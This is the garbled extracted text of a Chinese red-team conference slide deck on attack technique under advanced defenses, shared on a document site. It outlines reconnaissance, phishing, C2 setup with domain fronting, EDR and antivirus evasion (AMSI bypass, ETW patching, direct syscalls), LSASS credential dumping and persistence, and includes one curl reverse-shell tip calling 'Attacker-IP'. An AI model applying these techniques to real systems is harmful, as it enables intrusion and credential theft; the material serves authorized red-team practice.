《215薛逸钒-高级对抗下蓝军攻击技术思考(23页).pdf》由会员分享,可在线阅读,更多相关《215薛逸钒-高级对抗下蓝军攻击技术思考(23页).pdf(23页珍藏版)》请在三个皮匠报告上搜索。
1、高级对抗下蓝军攻击技术思考腾讯企业IT 薛逸钒项目经历某大型攻防演练个人得分2w+百万服务器级渗透经验国内大型互联网金融重保擅长黑客攻防漏洞挖掘、渗透测试、攻防对抗、安全研究个人介绍薛逸钒腾讯企业IT部/渗透测试组2年EDR对抗经验工作职责红蓝对抗办公网渗透APT仿真About me攻防现状攻防思考如何高效开展行动?攻击案例挑战与展望目录1攻防现状1 攻防现状一个问题?APT1 攻防现状蓝军行动演变互联网突破旁站攻击传统攻击行为vpn邮箱供应链攻击钓鱼、水坑业务链接单位攻击以0day促防以站促防以人促防 易难防御体系建设难度Web攻击IDC 横向移动获取web服务权限反序列化命令注入文件上传S
2、SRFSQL注入XSSXXELFI扫描器WAF高危服务收敛漏洞扫描敏感信息泄漏正则匹配主动防御蜜罐机器学习1 攻防现状 web入口如何难?EDR:主机行为、网络流量纵深防御DevSecOps安全测试上线前检查代码审计木马稳定上线鱼叉上线横向移动后渗透阶段寻找路径获取核心区域权限持久控制、外传数据邮件制作木马制作身份构思C&C搭建邮服申请域名伪造隧道代理网络扫描落地木马Web访问密码获取服务器登陆文件翻找数据库连接密码喷洒主机后门金/银凭据Webshell拖Hash核心业务登陆大数据外传员工安全培训、宣导XDR:主机行为、网络流量纵深防御安全左移威胁情报自动化安全响应1 攻防现状-鱼叉攻击 2攻
3、防思考情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动确定攻击目标范围引擎搜索相关资产扫描爆破相关资产情报搜索判断属于攻击范围收集有效范围详细信息信息整理分类(web、人员)情报处理输出有效范围详细信息输出易攻击站点/服务器输出易攻击角色情报输出2 攻防思考-情报收集 情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动2 攻防思考-外网打点 1day Payload攻击特征定制化尽可能编码无文件落地非常规反弹shellFileWebshell免杀去特征落地工具修改变换md5、重新编译木马小巧,简单traffic反弹shell流量加密混淆
4、Udp反弹shellWebshell通信加密0day 情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动2 攻防思考-外网打点-tips curl-sNkT.http:/Attacker-IP:8080&1|:情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动设施名称加固措施teamserverCobalt strike二开前置流量转发,drop探测流量各个角色使用不同CDN域名上线邮件服务正确配置高可信域名发送频率Gophish二开2 攻防思考-基础设施搭建 情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动2 攻防思考-钓鱼鱼饵制作钓鱼文案木马制作方式充当什么角色目标什么身份新鲜、合
5、理、有说服力符合用户习惯Bypass AVBypass edr定制化行为邮件投递物理入侵IM聊天投递 真实可信精致小巧贴近日常情报收集外网打点基础设施部署钓鱼鱼饵制作内网横向移动 本地高价值文件 NFS/WIKI SVN/GIT/备份 网络架构信息收集关联信息整合,分析企业习惯模拟用户习惯进行攻击寻找杀伤性大的风险扩大战果 自研后门 VPN凭据 Dll劫持权限维持2 攻防思考-横向移动 3如何高效开展行动?部署快打点准权限稳知识积累、武器储备获取可购买、相似度高域名对域名使用CDN进行域前置获取高可信度CDN厂商域名域名资产收集自研风险测绘收集目标ip资产信息目标人物数据过滤随机定制化prof
6、ile自动化部署Redirector根据域名设置域前置钓鱼服务(模版、邮服)一键化免杀平台可定制性操作免杀everything流量加密、无特征轻量级代理即用即开部署快打点准权限稳恶意域名目标信息基础设施木马制作代理搭建WEB部署管理平台 3 如何高效开展行动-部署快部署快打点准权限稳人员资产信息流服务资产信息流资产管理平台输出“易”攻击人员 人物角色为运维、开发、财务、HR 关联信息发现对应密码、手机等信息输出“易”攻击服务器信息 经扫描存在漏洞 使用历史存在漏洞组件 敏感资产列表(邮箱、办公OA)3 如何高效开展行动-打点准部署快打点准权限稳木马免杀隧道代理密码获取权限维持信息收集PE&Sh
7、ellcode Loader/Process Ghosting流量端到端加密Fake LogonDLL 白加黑调用原生API翻找文件和获取系统信息对抗EDR的通用Unhook稳定的反向代理通道Dump LSASSDaemon远程加载Shellcode半自动化过滤敏感文件(Sharpdir)Direct Syscall不落地执行CredSSPExchange Webshell善用SPN扫描、Ldap查询Anti-SandboxTCPUDPHTTPSocks5Net-NTLMv1用户账户持久控制邮箱内容翻找签名伪造套接字信道复用浏览器/Windows Credentials域内权限维持关键wiki站点收集Microsoft signature restricted/PPID spoof多种传输协议:KCP/QUIC/ICMPAMSI bypass/ETW patch 3 如何高效开展行动-权限稳4攻击案例获得敏感资料、站点地址、密码信息通过代理进入内网自动部署反向代理自动文件搜索WAF?XDR?XDR?合法身份访问运维平台web站点登陆服务器执行运维命令正常业务服务器连接数据库4 攻击案例 5挑战与展望5 挑战与展望 人工渗透武器化平台化